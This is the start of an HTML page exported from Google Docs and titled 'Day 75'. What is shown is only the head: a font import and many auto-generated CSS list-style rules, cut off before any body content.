<html>

<head>
	<meta content="text/html; charset=UTF-8" http-equiv="content-type">
	<title>Day 75</title>
	<style type="text/css">
		@import url('https://themes.googleusercontent.com/fonts/css?kit=-lTUqgJg2dxbe4D7B5DEID164ctO4cAXGRkC_ZwBWlzm74GqoUREvGx3nvtIBwYUN4duVc9C58uwPiY8_59Fz51Zsjtnjtw1i9vMMjzZT74');

		.lst-kix_t8twi5tix7m3-4>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-4
		}

		.lst-kix_5bbn6o1fums7-8>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-8, lower-roman) ". "
		}

		.lst-kix_5bbn6o1fums7-5>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-5, lower-roman) ". "
		}

		.lst-kix_n6wv8d8mqg4j-2>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-2
		}

		.lst-kix_5bbn6o1fums7-6>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-6, decimal) ". "
		}

		.lst-kix_5bbn6o1fums7-7>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-7, lower-latin) ". "
		}

		.lst-kix_5lp3gqbxm2h8-1>li:before {
			content: "\0025cb  "
		}

		ul.lst-kix_c8glqpz4x2ma-8 {
			list-style-type: none
		}

		.lst-kix_5lp3gqbxm2h8-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_5lp3gqbxm2h8-3>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_c8glqpz4x2ma-3 {
			list-style-type: none
		}

		ul.lst-kix_c8glqpz4x2ma-2 {
			list-style-type: none
		}

		ul.lst-kix_c8glqpz4x2ma-1 {
			list-style-type: none
		}

		ul.lst-kix_c8glqpz4x2ma-0 {
			list-style-type: none
		}

		.lst-kix_5lp3gqbxm2h8-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_5lp3gqbxm2h8-6>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_c8glqpz4x2ma-7 {
			list-style-type: none
		}

		ul.lst-kix_c8glqpz4x2ma-6 {
			list-style-type: none
		}

		ol.lst-kix_avc0gcoxesrz-7.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-7 0
		}

		.lst-kix_571au0wapsr5-0>li {
			counter-increment: lst-ctn-kix_571au0wapsr5-0
		}

		ul.lst-kix_c8glqpz4x2ma-5 {
			list-style-type: none
		}

		ul.lst-kix_c8glqpz4x2ma-4 {
			list-style-type: none
		}

		.lst-kix_5lp3gqbxm2h8-5>li:before {
			content: "\0025a0  "
		}

		ol.lst-kix_571au0wapsr5-7 {
			list-style-type: none
		}

		ol.lst-kix_571au0wapsr5-6 {
			list-style-type: none
		}

		.lst-kix_5lp3gqbxm2h8-8>li:before {
			content: "\0025a0  "
		}

		ol.lst-kix_571au0wapsr5-8 {
			list-style-type: none
		}

		.lst-kix_pj27egx948rq-1>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-1
		}

		ol.lst-kix_571au0wapsr5-3 {
			list-style-type: none
		}

		.lst-kix_fi2xbrv6fzbg-7>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-7
		}

		ol.lst-kix_571au0wapsr5-2 {
			list-style-type: none
		}

		ol.lst-kix_571au0wapsr5-5 {
			list-style-type: none
		}

		ol.lst-kix_pj27egx948rq-7.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-7 0
		}

		.lst-kix_5lp3gqbxm2h8-7>li:before {
			content: "\0025cb  "
		}

		ol.lst-kix_571au0wapsr5-4 {
			list-style-type: none
		}

		ol.lst-kix_5bbn6o1fums7-8.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-8 0
		}

		ol.lst-kix_571au0wapsr5-1 {
			list-style-type: none
		}

		ol.lst-kix_571au0wapsr5-0 {
			list-style-type: none
		}

		.lst-kix_avc0gcoxesrz-6>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-6
		}

		.lst-kix_kjisakvjzjsi-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_i6qpwdhuifir-8>li:before {
			content: "\0025a0  "
		}

		.lst-kix_fi2xbrv6fzbg-3>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-3
		}

		.lst-kix_kjisakvjzjsi-3>li:before {
			content: "\0025cf  "
		}

		.lst-kix_kjisakvjzjsi-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_kjisakvjzjsi-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_i6qpwdhuifir-3>li:before {
			content: "\0025cf  "
		}

		ol.lst-kix_pj27egx948rq-7 {
			list-style-type: none
		}

		.lst-kix_kjisakvjzjsi-7>li:before {
			content: "\0025cb  "
		}

		.lst-kix_i6qpwdhuifir-2>li:before {
			content: "\0025a0  "
		}

		ol.lst-kix_pj27egx948rq-6 {
			list-style-type: none
		}

		.lst-kix_kjisakvjzjsi-6>li:before {
			content: "\0025cf  "
		}

		.lst-kix_kjisakvjzjsi-8>li:before {
			content: "\0025a0  "
		}

		ol.lst-kix_pj27egx948rq-8 {
			list-style-type: none
		}

		.lst-kix_i6qpwdhuifir-0>li:before {
			content: "\0025cf  "
		}

		ol.lst-kix_pj27egx948rq-3 {
			list-style-type: none
		}

		ol.lst-kix_pj27egx948rq-2 {
			list-style-type: none
		}

		.lst-kix_i6qpwdhuifir-1>li:before {
			content: "\0025cb  "
		}

		ol.lst-kix_pj27egx948rq-5 {
			list-style-type: none
		}

		ol.lst-kix_pj27egx948rq-4 {
			list-style-type: none
		}

		.lst-kix_t8twi5tix7m3-0>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-0
		}

		.lst-kix_5bbn6o1fums7-1>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-1, lower-latin) ". "
		}

		.lst-kix_5bbn6o1fums7-2>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-2, lower-roman) ". "
		}

		.lst-kix_5bbn6o1fums7-0>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-0, decimal) ". "
		}

		.lst-kix_5lp3gqbxm2h8-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_5bbn6o1fums7-4>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-4, lower-latin) ". "
		}

		ul.lst-kix_i6qpwdhuifir-0 {
			list-style-type: none
		}

		.lst-kix_5bbn6o1fums7-3>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-3, decimal) ". "
		}

		ul.lst-kix_i6qpwdhuifir-2 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-1 {
			list-style-type: none
		}

		.lst-kix_avc0gcoxesrz-2>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-2
		}

		ul.lst-kix_i6qpwdhuifir-4 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-3 {
			list-style-type: none
		}

		ol.lst-kix_5bbn6o1fums7-3.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-3 0
		}

		ul.lst-kix_i6qpwdhuifir-6 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-4.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-4 0
		}

		ul.lst-kix_i6qpwdhuifir-5 {
			list-style-type: none
		}

		ol.lst-kix_avc0gcoxesrz-2.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-2 0
		}

		ul.lst-kix_i6qpwdhuifir-8 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-7 {
			list-style-type: none
		}

		.lst-kix_i6qpwdhuifir-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_i6qpwdhuifir-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_i6qpwdhuifir-6>li:before {
			content: "\0025cf  "
		}

		ol.lst-kix_n6wv8d8mqg4j-5.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-5 0
		}

		ol.lst-kix_pj27egx948rq-2.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-2 0
		}

		.lst-kix_kjisakvjzjsi-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_kjisakvjzjsi-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_i6qpwdhuifir-7>li:before {
			content: "\0025cb  "
		}

		ol.lst-kix_5bbn6o1fums7-6.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-6 0
		}

		.lst-kix_571au0wapsr5-0>li:before {
			content: ""counter(lst-ctn-kix_571au0wapsr5-0, decimal) ". "
		}

		ul.lst-kix_2yzjaagjqxah-0 {
			list-style-type: none
		}

		.lst-kix_fi2xbrv6fzbg-0>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-0
		}

		ul.lst-kix_2yzjaagjqxah-7 {
			list-style-type: none
		}

		.lst-kix_571au0wapsr5-4>li:before {
			content: ""counter(lst-ctn-kix_571au0wapsr5-4, lower-latin) ". "
		}

		ul.lst-kix_2yzjaagjqxah-8 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-5 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-6 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-3 {
			list-style-type: none
		}

		.lst-kix_571au0wapsr5-6>li:before {
			content: ""counter(lst-ctn-kix_571au0wapsr5-6, decimal) ". "
		}

		ul.lst-kix_2yzjaagjqxah-4 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-1 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-2 {
			list-style-type: none
		}

		.lst-kix_q172a0nf55p3-2>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-2
		}

		.lst-kix_571au0wapsr5-2>li:before {
			content: ""counter(lst-ctn-kix_571au0wapsr5-2, lower-roman) ". "
		}

		ol.lst-kix_fi2xbrv6fzbg-6.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-6 0
		}

		.lst-kix_avc0gcoxesrz-5>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-5, lower-roman) ". "
		}

		.lst-kix_avc0gcoxesrz-7>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-7, lower-latin) ". "
		}

		ol.lst-kix_571au0wapsr5-6.start {
			counter-reset: lst-ctn-kix_571au0wapsr5-6 0
		}

		ol.lst-kix_pj27egx948rq-1 {
			list-style-type: none
		}

		.lst-kix_avc0gcoxesrz-1>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-1, lower-latin) ". "
		}

		ol.lst-kix_pj27egx948rq-0 {
			list-style-type: none
		}

		.lst-kix_571au0wapsr5-8>li:before {
			content: ""counter(lst-ctn-kix_571au0wapsr5-8, lower-roman) ". "
		}

		ol.lst-kix_t8twi5tix7m3-1 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-0 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-3.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-3 0
		}

		ol.lst-kix_t8twi5tix7m3-7 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-6 {
			list-style-type: none
		}

		.lst-kix_t8twi5tix7m3-8>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-8
		}

		.lst-kix_avc0gcoxesrz-3>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-3, decimal) ". "
		}

		ol.lst-kix_t8twi5tix7m3-8 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-3 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-2 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-0.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-0 0
		}

		ol.lst-kix_t8twi5tix7m3-5 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-4 {
			list-style-type: none
		}

		.lst-kix_q172a0nf55p3-1>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-1
		}

		.lst-kix_c8glqpz4x2ma-7>li:before {
			content: "-  "
		}

		.lst-kix_t8twi5tix7m3-1>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-1
		}

		.lst-kix_c8glqpz4x2ma-5>li:before {
			content: "-  "
		}

		.lst-kix_t8twi5tix7m3-7>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-7
		}

		.lst-kix_c8glqpz4x2ma-1>li:before {
			content: "-  "
		}

		ol.lst-kix_571au0wapsr5-8.start {
			counter-reset: lst-ctn-kix_571au0wapsr5-8 0
		}

		.lst-kix_c8glqpz4x2ma-3>li:before {
			content: "-  "
		}

		ol.lst-kix_q172a0nf55p3-1.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-1 0
		}

		.lst-kix_q172a0nf55p3-8>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-8
		}

		.lst-kix_5bbn6o1fums7-2>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-2
		}

		.lst-kix_pj27egx948rq-8>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-8
		}

		ol.lst-kix_fi2xbrv6fzbg-8.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-8 0
		}

		ol.lst-kix_pj27egx948rq-5.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-5 0
		}

		.lst-kix_571au0wapsr5-4>li {
			counter-increment: lst-ctn-kix_571au0wapsr5-4
		}

		ol.lst-kix_avc0gcoxesrz-5.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-5 0
		}

		ol.lst-kix_n6wv8d8mqg4j-7.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-7 0
		}

		.lst-kix_q172a0nf55p3-8>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-8, lower-roman) ". "
		}

		.lst-kix_q172a0nf55p3-7>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-7, lower-latin) ". "
		}

		.lst-kix_q172a0nf55p3-4>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-4, lower-latin) ". "
		}

		.lst-kix_q172a0nf55p3-6>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-6
		}

		.lst-kix_t8twi5tix7m3-3>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-3
		}

		.lst-kix_q172a0nf55p3-3>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-3, decimal) ". "
		}

		.lst-kix_fi2xbrv6fzbg-3>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-3, decimal) ". "
		}

		.lst-kix_n6wv8d8mqg4j-1>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-1
		}

		ol.lst-kix_5bbn6o1fums7-5.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-5 0
		}

		.lst-kix_q172a0nf55p3-0>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-0, decimal) ". "
		}

		.lst-kix_fi2xbrv6fzbg-4>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-4, lower-latin) ". "
		}

		.lst-kix_fi2xbrv6fzbg-4>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-4
		}

		.lst-kix_fi2xbrv6fzbg-7>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-7, lower-latin) ". "
		}

		.lst-kix_t8twi5tix7m3-5>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-5
		}

		.lst-kix_fi2xbrv6fzbg-8>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-8, lower-roman) ". "
		}

		ol.lst-kix_fi2xbrv6fzbg-0.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-0 0
		}

		.lst-kix_pj27egx948rq-7>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-7
		}

		.lst-kix_571au0wapsr5-5>li {
			counter-increment: lst-ctn-kix_571au0wapsr5-5
		}

		.lst-kix_5bbn6o1fums7-3>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-3
		}

		ol.lst-kix_fi2xbrv6fzbg-4.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-4 0
		}

		ol.lst-kix_571au0wapsr5-5.start {
			counter-reset: lst-ctn-kix_571au0wapsr5-5 0
		}

		ol.lst-kix_5bbn6o1fums7-4.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-4 0
		}

		.lst-kix_fi2xbrv6fzbg-0>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-0, decimal) ". "
		}

		.lst-kix_hkg89eyxvtvi-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_avc0gcoxesrz-5>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-5
		}

		ol.lst-kix_571au0wapsr5-4.start {
			counter-reset: lst-ctn-kix_571au0wapsr5-4 0
		}

		.lst-kix_hkg89eyxvtvi-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_pj27egx948rq-0>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-0
		}

		.lst-kix_hkg89eyxvtvi-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_pj27egx948rq-1>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-1, lower-latin) ". "
		}

		.lst-kix_pj27egx948rq-0>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-0, decimal) ". "
		}

		.lst-kix_hkg89eyxvtvi-6>li:before {
			content: "\0025cf  "
		}

		ol.lst-kix_fi2xbrv6fzbg-5.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-5 0
		}

		.lst-kix_lh5aqr9xz8oa-3>li:before {
			content: "\0025cf  "
		}

		.lst-kix_571au0wapsr5-3>li:before {
			content: ""counter(lst-ctn-kix_571au0wapsr5-3, decimal) ". "
		}

		ol.lst-kix_fi2xbrv6fzbg-3 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-4 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-1 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-2 {
			list-style-type: none
		}

		ol.lst-kix_571au0wapsr5-3.start {
			counter-reset: lst-ctn-kix_571au0wapsr5-3 0
		}

		ol.lst-kix_fi2xbrv6fzbg-0 {
			list-style-type: none
		}

		.lst-kix_pj27egx948rq-8>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-8, lower-roman) ". "
		}

		.lst-kix_n6wv8d8mqg4j-1>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-1, lower-latin) ". "
		}

		ol.lst-kix_fi2xbrv6fzbg-7 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-8 {
			list-style-type: none
		}

		.lst-kix_lh5aqr9xz8oa-7>li:before {
			content: "\0025cb  "
		}

		ol.lst-kix_fi2xbrv6fzbg-5 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-6 {
			list-style-type: none
		}

		ol.lst-kix_571au0wapsr5-0.start {
			counter-reset: lst-ctn-kix_571au0wapsr5-0 0
		}

		.lst-kix_pj27egx948rq-4>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-4, lower-latin) ". "
		}

		.lst-kix_avc0gcoxesrz-6>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-6, decimal) ". "
		}

		ol.lst-kix_n6wv8d8mqg4j-6.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-6 0
		}

		.lst-kix_avc0gcoxesrz-2>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-2, lower-roman) ". "
		}

		.lst-kix_n6wv8d8mqg4j-5>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-5, lower-roman) ". "
		}

		ol.lst-kix_fi2xbrv6fzbg-3.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-3 0
		}

		.lst-kix_avc0gcoxesrz-3>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-3
		}

		.lst-kix_571au0wapsr5-7>li:before {
			content: ""counter(lst-ctn-kix_571au0wapsr5-7, lower-latin) ". "
		}

		.lst-kix_q172a0nf55p3-4>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-4
		}

		.lst-kix_t8twi5tix7m3-2>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-2, lower-roman) ". "
		}

		.lst-kix_c8glqpz4x2ma-6>li:before {
			content: "-  "
		}

		ol.lst-kix_5bbn6o1fums7-1.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-1 0
		}

		.lst-kix_n6wv8d8mqg4j-6>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-6
		}

		.lst-kix_c8glqpz4x2ma-2>li:before {
			content: "-  "
		}

		ol.lst-kix_5bbn6o1fums7-0.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-0 0
		}

		ol.lst-kix_fi2xbrv6fzbg-1.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-1 0
		}

		.lst-kix_fi2xbrv6fzbg-2>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-2
		}

		ol.lst-kix_571au0wapsr5-1.start {
			counter-reset: lst-ctn-kix_571au0wapsr5-1 0
		}

		.lst-kix_2yzjaagjqxah-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_pj27egx948rq-5>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-5
		}

		.lst-kix_571au0wapsr5-7>li {
			counter-increment: lst-ctn-kix_571au0wapsr5-7
		}

		.lst-kix_5bbn6o1fums7-5>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-5
		}

		ol.lst-kix_n6wv8d8mqg4j-8.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-8 0
		}

		.lst-kix_2yzjaagjqxah-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_571au0wapsr5-2>li {
			counter-increment: lst-ctn-kix_571au0wapsr5-2
		}

		.lst-kix_q172a0nf55p3-7>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-7
		}

		.lst-kix_5bbn6o1fums7-0>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-0
		}

		ol.lst-kix_fi2xbrv6fzbg-2.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-2 0
		}

		ol.lst-kix_571au0wapsr5-7.start {
			counter-reset: lst-ctn-kix_571au0wapsr5-7 0
		}

		.lst-kix_2yzjaagjqxah-8>li:before {
			content: "\0025a0  "
		}

		ol.lst-kix_q172a0nf55p3-5.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-5 0
		}

		ol.lst-kix_pj27egx948rq-1.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-1 0
		}

		ol.lst-kix_avc0gcoxesrz-1.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-1 0
		}

		ol.lst-kix_n6wv8d8mqg4j-4.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-4 0
		}

		.lst-kix_n6wv8d8mqg4j-4>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-4
		}

		.lst-kix_t8twi5tix7m3-2>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-2
		}

		ol.lst-kix_5bbn6o1fums7-3 {
			list-style-type: none
		}

		ol.lst-kix_571au0wapsr5-2.start {
			counter-reset: lst-ctn-kix_571au0wapsr5-2 0
		}

		ol.lst-kix_5bbn6o1fums7-2 {
			list-style-type: none
		}

		ol.lst-kix_5bbn6o1fums7-1 {
			list-style-type: none
		}

		ol.lst-kix_5bbn6o1fums7-0 {
			list-style-type: none
		}

		ol.lst-kix_5bbn6o1fums7-2.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-2 0
		}

		.lst-kix_t8twi5tix7m3-3>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-3, decimal) ". "
		}

		.lst-kix_t8twi5tix7m3-4>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-4, lower-latin) ". "
		}

		.lst-kix_t8twi5tix7m3-6>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-6, decimal) ". "
		}

		.lst-kix_t8twi5tix7m3-5>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-5, lower-roman) ". "
		}

		.lst-kix_t8twi5tix7m3-7>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-7, lower-latin) ". "
		}

		ol.lst-kix_5bbn6o1fums7-7 {
			list-style-type: none
		}

		ol.lst-kix_5bbn6o1fums7-6 {
			list-style-type: none
		}

		ol.lst-kix_5bbn6o1fums7-5 {
			list-style-type: none
		}

		ol.lst-kix_5bbn6o1fums7-4 {
			list-style-type: none
		}

		.lst-kix_t8twi5tix7m3-8>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-8, lower-roman) ". "
		}

		.lst-kix_t8twi5tix7m3-6>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-6
		}

		ol.lst-kix_5bbn6o1fums7-8 {
			list-style-type: none
		}

		.lst-kix_571au0wapsr5-6>li {
			counter-increment: lst-ctn-kix_571au0wapsr5-6
		}

		.lst-kix_5bbn6o1fums7-7>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-7
		}

		.lst-kix_avc0gcoxesrz-8>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-8
		}

		.lst-kix_pj27egx948rq-3>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-3
		}

		.lst-kix_q172a0nf55p3-0>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-0
		}

		.lst-kix_q172a0nf55p3-3>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-3
		}

		ol.lst-kix_avc0gcoxesrz-8.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-8 0
		}

		.lst-kix_lh5aqr9xz8oa-2>li:before {
			content: "\0025a0  "
		}

		ul.lst-kix_kjisakvjzjsi-8 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-5 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-8>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-8
		}

		ul.lst-kix_kjisakvjzjsi-4 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-7 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-6 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-5 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-6 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-3 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-4 {
			list-style-type: none
		}

		.lst-kix_lh5aqr9xz8oa-0>li:before {
			content: "  "
		}

		.lst-kix_lh5aqr9xz8oa-8>li:before {
			content: "\0025a0  "
		}

		ol.lst-kix_n6wv8d8mqg4j-7 {
			list-style-type: none
		}

		ol.lst-kix_pj27egx948rq-8.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-8 0
		}

		ol.lst-kix_n6wv8d8mqg4j-8 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-2>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-2, lower-roman) ". "
		}

		.lst-kix_pj27egx948rq-5>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-5, lower-roman) ". "
		}

		.lst-kix_pj27egx948rq-7>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-7, lower-latin) ". "
		}

		ol.lst-kix_n6wv8d8mqg4j-1 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-0>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-0, decimal) ". "
		}

		ol.lst-kix_n6wv8d8mqg4j-2 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-4>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-4, lower-latin) ". "
		}

		ol.lst-kix_n6wv8d8mqg4j-0 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-1 {
			list-style-type: none
		}

		.lst-kix_avc0gcoxesrz-1>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-1
		}

		.lst-kix_lh5aqr9xz8oa-6>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_kjisakvjzjsi-0 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-3 {
			list-style-type: none
		}

		.lst-kix_pj27egx948rq-3>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-3, decimal) ". "
		}

		ul.lst-kix_kjisakvjzjsi-2 {
			list-style-type: none
		}

		.lst-kix_lh5aqr9xz8oa-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_n6wv8d8mqg4j-8>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-8, lower-roman) ". "
		}

		.lst-kix_n6wv8d8mqg4j-6>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-6, decimal) ". "
		}

		ol.lst-kix_avc0gcoxesrz-3.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-3 0
		}

		.lst-kix_avc0gcoxesrz-0>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-0
		}

		ol.lst-kix_t8twi5tix7m3-8.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-8 0
		}

		.lst-kix_t8twi5tix7m3-1>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-1, lower-latin) ". "
		}

		ol.lst-kix_avc0gcoxesrz-6.start {
